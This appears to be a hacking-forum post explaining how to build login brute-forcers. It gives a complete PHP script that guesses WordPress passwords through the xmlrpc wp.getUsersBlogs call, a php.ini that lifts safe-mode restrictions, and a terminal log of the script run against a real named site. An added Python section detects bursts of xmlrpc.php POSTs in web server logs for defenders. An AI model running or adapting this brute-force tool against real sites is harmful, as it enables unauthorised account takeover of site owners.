Very simple. By analysing the site (if it is a private CMS) you can write a bruter based on the differences between wrong and correct attempts.
It is a specific question and there can be millions of cases.
Status code
Response
Cookie
TIMING
etc.
To do this you need at least some knowledge of PHP, to a certain degree.
The curl_* functions / if statement / preg_match or stristr can be used for exactly this.
For example, my bruteforce script for WordPress, written by abusing the xmlrpc API.
You will write yours by analogy. There is nothing unusual about it.
http://pastebin.com/dHi7qdRw
[blackhat@fedora tmp]$ php -c ~/shellz/xmlrpcbrutewp/php.ini -f /tmp/brut.php admin /home/blackhat/Desktop/founds/1.txt http://verona.am/xmlrpc.php
############################################################
**************** WORDPRESS XMLRPC BRUTEFORCE TOOL **************
********************* Istifade qaydasi ********************
php -f script.php username luget.txt http://domain.adi/xmlrpc.php
****************************************************
Hint: VALID ISTIFADECI ADI: http://domain.adi/?author=1 GRAB ET
HEDEF => http://verona.am/xmlrpc.php
[ 1 ] USERNAME: admin PAROL QISMINDE: ``` ==> Saytdan cavab:[ Incorrect username or password. ]
[ 2 ] USERNAME: admin PAROL QISMINDE: 009213 ==> Saytdan cavab:[ Incorrect username or password. ]
[ 3 ] USERNAME: admin PAROL QISMINDE: 023971 ==> Saytdan cavab:[ Incorrect username or password. ]
[ 4 ] USERNAME: admin PAROL QISMINDE: 025513 ==> Saytdan cavab:[ Incorrect username or password. ]
[ 5 ] USERNAME: admin PAROL QISMINDE: 004777 ==> Saytdan cavab:[ Incorrect username or password. ]
[ 6 ] USERNAME: admin PAROL QISMINDE: 022430 ==> Saytdan cavab:[ Incorrect username or password. ]
[ 7 ] USERNAME: admin PAROL QISMINDE: 039000 ==> Saytdan cavab:[ Incorrect username or password. ]
[ 8 ] USERNAME: admin PAROL QISMINDE: 002511 ==> Saytdan cavab:[ Incorrect username or password. ]
[ 9 ] USERNAME: admin PAROL QISMINDE: 036565 ==> Saytdan cavab:[ Incorrect username or password. ]
[ 10 ] USERNAME: admin PAROL QISMINDE: 095900 ==> Saytdan cavab:[ Incorrect username or password. ]
HEDEF => http://verona.am/xmlrpc.php
[ 11 ] USERNAME: admin PAROL QISMINDE: 098710 ==> Saytdan cavab:[ Incorrect username or password. ]
[ 12 ] USERNAME: admin PAROL QISMINDE: 090932 ==> Saytdan cavab:[ Incorrect username or password. ]
[ 13 ] USERNAME: admin PAROL QISMINDE: 095495 ==> Saytdan cavab:[ Incorrect username or password. ]
[ 14 ] USERNAME: admin PAROL QISMINDE: 0pera ==> Saytdan cavab:[ Incorrect username or password. ]
[ 15 ] USERNAME: admin PAROL QISMINDE: 123593 ==> Saytdan cavab:[ Incorrect username or password. ]
[ 16 ] USERNAME: admin PAROL QISMINDE: 1234com ==> Saytdan cavab:[ Incorrect username or password. ]
[ 17 ] USERNAME: admin PAROL QISMINDE: 12s12s ==> Saytdan cavab:[ Incorrect username or password. ]
[ 18 ] USERNAME: admin PAROL QISMINDE: 123zz ==> Saytdan cavab:[ Incorrect username or password. ]
[ 19 ] USERNAME: admin PAROL QISMINDE: 128764 ==> Saytdan cavab:[ Incorrect username or password. ]
[ 20 ] USERNAME: admin PAROL QISMINDE: 127854 ==> Saytdan cavab:[ Incorrect username or password. ]
HEDEF => http://verona.am/xmlrpc.php
[ 21 ] USERNAME: admin PAROL QISMINDE: 102140 ==> Saytdan cavab:[ Incorrect username or password. ]
[ 22 ] USERNAME: admin PAROL QISMINDE: 105687 ==> Saytdan cavab:[ Incorrect username or password. ]
[ 23 ] USERNAME: admin PAROL QISMINDE: 16ah79 ==> Saytdan cavab:[ Incorrect username or password. ]
[ 24 ] USERNAME: admin PAROL QISMINDE: 148847 ==> Saytdan cavab:[ Incorrect username or password. ]
[ 25 ] USERNAME: admin PAROL QISMINDE: 163305 ==> Saytdan cavab:[ Incorrect username or password. ]
[ 26 ] USERNAME: admin PAROL QISMINDE: 171709 ==> Saytdan cavab:[ Incorrect username or password. ]
[ 27 ] USERNAME: admin PAROL QISMINDE: 167179 ==> Saytdan cavab:[ Incorrect username or password. ]
[ 28 ] USERNAME: admin PAROL QISMINDE: 174170 ==> Saytdan cavab:[ Incorrect username or password. ]
[ 29 ] USERNAME: admin PAROL QISMINDE: 159688 ==> Saytdan cavab:[ Incorrect username or password. ]
[ 30 ] USERNAME: admin PAROL QISMINDE: 153531 ==> Saytdan cavab:[ Incorrect username or password. ]
HEDEF => http://verona.am/xmlrpc.php
[ 31 ] USERNAME: admin PAROL QISMINDE: 194028 ==> Saytdan cavab:[ Incorrect username or password. ]
[ 32 ] USERNAME: admin PAROL QISMINDE: 193349 ==> Saytdan cavab:[ Incorrect username or password. ]
[ 33 ] USERNAME: admin PAROL QISMINDE: 194619 ==> Saytdan cavab:[ Incorrect username or password. ]
[ 34 ] USERNAME: admin PAROL QISMINDE: 20000A ==> Saytdan cavab:[ Incorrect username or password. ]
[ 35 ] USERNAME: admin PAROL QISMINDE: 233077 ==> Saytdan cavab:[ Incorrect username or password. ]
[ 36 ] USERNAME: admin PAROL QISMINDE: 234564 ==> Saytdan cavab:[ Incorrect username or password. ]
[ 37 ] USERNAME: admin PAROL QISMINDE: 216866 ==> Saytdan cavab:[ Incorrect username or password. ]
[ 38 ] USERNAME: admin PAROL QISMINDE: 231041 ==> Saytdan cavab:[ Incorrect username or password. ]
[ 39 ] USERNAME: admin PAROL QISMINDE: 252631 ==> Saytdan cavab:[ Incorrect username or password. ]
[ 40 ] USERNAME: admin PAROL QISMINDE: 24637 ==> Saytdan cavab:[ Incorrect username or password. ]
HEDEF => http://verona.am/xmlrpc.php
[ 41 ] USERNAME: admin PAROL QISMINDE: 248953 ==> Saytdan cavab:[ Incorrect username or password. ]
[ 42 ] USERNAME: admin PAROL QISMINDE: 248168 ==> Saytdan cavab:[ Incorrect username or password. ]
[ 43 ] USERNAME: admin PAROL QISMINDE: 270431 ==> Saytdan cavab:[ Incorrect username or password. ]
[ 44 ] USERNAME: admin PAROL QISMINDE: 28803 ==> Saytdan cavab:[ Incorrect username or password. ]
^C
Code:
$ cat ~/shellz/xmlrpcbrutewp/php.ini
safe_mode = off
open_basedir=
disable_functions=
[blackhat@fedora ~]$ cat /tmp/brut.php
<?php
/*
Wordpress xmlrpc Bruteforce tool
Coded by AkaStep
*/
error_reporting(0);
ini_set('memory_limit', '6000M');
set_time_limit(0);
$usage='php -f script.php username luget.txt http://domain.adi/xmlrpc.php';
// banner wrapped in ANSI colour codes; printed on start and again on wrong usage
$banner=chr(27) ."[42m" . str_repeat('#',60) . PHP_EOL . ' **************** WORDPRESS XMLRPC BRUTEFORCE TOOL **************' . PHP_EOL .
    ' ********************* Istifade qaydasi ********************'.
    PHP_EOL .$usage . PHP_EOL .
    ' ****************************************************'. PHP_EOL .
    'Hint: VALID ISTIFADECI ADI: http://domain.adi/?author=1 GRAB ET ' . chr(27) . "[0m" .PHP_EOL ;
// positional arguments: username, wordlist path, xmlrpc endpoint URL
$uname=$argv[1];
$luget=$argv[2];
$hedef=$argv[3];
if(count($argv) < 4){ die(PHP_EOL . $banner . PHP_EOL);}
echo $banner;
// wordlist is read into memory as one array element per line
$luget=file($luget) or die('Luget Fayli Aca bilmirem!');
$i=NULL;
foreach($luget as $pass)
{
    $i++;
    $ch = curl_init();
    // one wp.getUsersBlogs XML-RPC call per wordlist entry
    $curlConfig = array(
        CURLOPT_URL => $hedef,
        CURLOPT_POST => true,
        CURLOPT_RETURNTRANSFER => true,
        CURLOPT_TIMEOUT => 5,
        CURLOPT_USERAGENT => 'MSIE 8 GECKO 9 BRUTEFORCE TRY MOZILLA GECKO BLAH LINUX PENTEST',
        CURLOPT_POSTFIELDS => '<methodCall><methodName>wp.getUsersBlogs</methodName><params><param><value>
<string>' . $uname . '</string></value></param>
<param><value><string>' . $pass . '</string></value></param></params>
</methodCall>');
    curl_setopt_array($ch, $curlConfig);
    $result = curl_exec($ch);
    // the XML reply is split into lines; index 11 is expected to hold the fault string,
    // index 7 the boolean member (depends on the exact layout of the server's response)
    $massiv=explode(PHP_EOL,$result);
    $result0=str_ireplace(array('<value><string>',
        '</string></value>'),'',(string)$massiv[11]);
    //echo var_dump($massiv);
    // reprint the target header every 10 attempts
    if($i % 10==1) {
        echo chr(27) . "[43m" . ' HEDEF => ' . preg_replace('/[^A-Za-z0-9\.\\:\\/]/i','',(string)$hedef). chr(27) . "[0m" .PHP_EOL;
    }
    // the decision is made on the response body, not the HTTP status code:
    // any reply that lacks the failure string is treated as a hit and the script stops
    if(!stristr($result,'Incorrect username or password')) die(PHP_EOL .chr(27) . "[42m" . '=======> TAPILDI! Username: ' . $uname . ' PAROL => ' . $pass . ' ==> Saytdan cavab:[ ' .
        preg_replace('/[^A-Za-z]/i','',str_ireplace(array('<member><name>',
        '</name>','<value><boolean>','</boolean></value></member>'),'',(string)$massiv[7])) . ' ] ' . ' <======= ' . PHP_EOL . 'HEDEF: ' . $hedef. chr(27) . "[0m" .PHP_EOL);
    echo chr(27) . "[41m" . '[ ' . $i . ' ] USERNAME: ' . $uname . ' PAROL QISMINDE: ' . trim($pass) . ' ==> Saytdan cavab:[ ' . trim($result0) . ' ] ' . chr(27) . "[0m" . PHP_EOL ;
    curl_close($ch);
}
unset($pass);
?>
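The script above decides on the response body alone, because WordPress answers a failed xmlrpc login with HTTP 200 and a fault inside the XML; the status code in the web server log therefore says nothing, and the thing a defender can see is the request rate: a burst of POSTs to xmlrpc.php from one client. The following is an added example, not part of the original post or the script author's code; it parses constructed Apache combined-log lines (the IPs, timestamps and user agents are made up) and flags any client exceeding a threshold of xmlrpc.php POSTs inside a sliding window.

```python
import re
from collections import defaultdict
from datetime import datetime, timedelta, timezone

# Combined log format. HTTP status is no use here: WordPress answers a wrong
# xmlrpc login with 200 and a fault in the XML body, so we count request rate.
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>\S+) (?P<path>\S+) [^"]*" '
    r'(?P<status>\d{3}) \S+ "[^"]*" "(?P<ua>[^"]*)"$')
TS_FMT = "%d/%b/%Y:%H:%M:%S %z"

def parse_line(line):
    """Parse one combined-log line into a dict, or None if it does not match."""
    m = LOG_RE.match(line)
    if not m:
        return None
    rec = m.groupdict()
    rec["ts"] = datetime.strptime(rec["ts"], TS_FMT)
    return rec

def find_xmlrpc_bursts(lines, threshold=10, window=timedelta(seconds=60)):
    """{ip: peak count} for clients exceeding `threshold` POSTs to /xmlrpc.php in `window`."""
    stamps_by_ip = defaultdict(list)
    for line in lines:
        rec = parse_line(line)
        if rec and rec["method"] == "POST" and rec["path"].split("?")[0] == "/xmlrpc.php":
            stamps_by_ip[rec["ip"]].append(rec["ts"])
    flagged = {}
    for ip, stamps in stamps_by_ip.items():
        stamps.sort()
        start = 0
        for end, ts in enumerate(stamps):
            while ts - stamps[start] > window:  # slide the window start forward
                start += 1
            count = end - start + 1
            if count > threshold:
                flagged[ip] = max(flagged.get(ip, 0), count)
    return flagged

def constructed_log():
    """Constructed sample lines, not real traffic: 12 xmlrpc POSTs in 12 s from one client, plus normal requests."""
    base = datetime(2023, 10, 10, 13, 55, 0, tzinfo=timezone.utc)
    fmt = '{ip} - - [{ts}] "{m} {p} HTTP/1.1" 200 512 "-" "{ua}"'
    def line(ip, sec, m, p, ua):
        return fmt.format(ip=ip, ts=(base + timedelta(seconds=sec)).strftime(TS_FMT), m=m, p=p, ua=ua)
    lines = [line("203.0.113.5", n, "POST", "/xmlrpc.php", "Mozilla/5.0") for n in range(12)]
    lines.append(line("198.51.100.7", 3, "GET", "/", "Mozilla/5.0"))
    lines.append(line("198.51.100.7", 5, "POST", "/xmlrpc.php", "WordPress/6.0; pingback"))
    return lines
```

A single legitimate pingback POST stays below the threshold, while the 12-request burst is reported with its peak count; the same counter can feed a block list or a fail2ban-style rule.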